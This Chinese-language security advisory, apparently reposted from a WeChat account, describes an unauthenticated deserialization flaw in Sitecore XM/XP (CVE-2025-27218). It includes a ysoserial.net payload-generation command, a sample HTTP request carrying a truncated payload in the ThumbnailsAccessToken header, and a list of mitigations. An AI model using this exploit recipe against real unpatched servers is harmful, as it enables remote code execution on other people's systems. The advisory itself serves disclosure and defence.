介绍
近日披露的 Sitecore 体验平台关键漏洞(CVE-2025-27218)允许未经身份验证的攻击者在未打补丁的系统上执行任意代码。该漏洞源于不安全的数据反序列化操作,影响 Sitecore 体验管理器(XM)和体验平台(XP)8.2 至 10.4 版本,这些版本在安装补丁 KB1002844 之前均存在风险。
技术细节
该漏洞位于 MachineKeyTokenService.IsTokenValid 方法中,该方法使用 Convert.Base64ToObject 对 ThumbnailsAccessToken HTTP 头中的不受信任数据进行反序列化。关键问题在于,反序列化操作发生在解密之前,这使得攻击者能够直接将精心构造的负载注入到处理流程中。
攻击者通过使用 ysoserial.net 等工具生成恶意的序列化对象,并利用 WindowsIdentity gadget 链来执行操作系统命令:
C:ysoserialRelease>ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c"whoami > inetpubwwwrootSitecoresc.dev.localApp_Datax.txt"生成的 Base64 编码负载被插入到 ThumbnailsAccessToken 头中。Sitecore 的 AuthenticateThumbnailsRequest HTTP 处理器(属于 httpRequestBegin 管道)会在没有身份验证检查的情况下解析该头,导致立即进行反序列化并激活负载。
GET / HTTP/1.1
Host: sitecoresc.dev.local
ThumbnailsAccessToken: AAEAAAD/////AQAAAAAAAAAEAQAAAC......
....解措施与建议
Sitecore 已发布补丁来修复 CVE-2025-27218,并敦促客户采取以下措施:
-
• 立即升级到 Sitecore 10.4 或应用安全补丁。 -
• 检查 HTTP 管道中是否存在未经授权的 BinaryFormatter 使用。 -
• 监控 ThumbnailsAccessToken头的异常活动。
对于无法立即打补丁的组织,微软建议强制执行 Serialization Binder 限制,或通过运行时配置完全禁用 BinaryFormatter。
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):Sitecore 曝零日漏洞,可远程命令执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论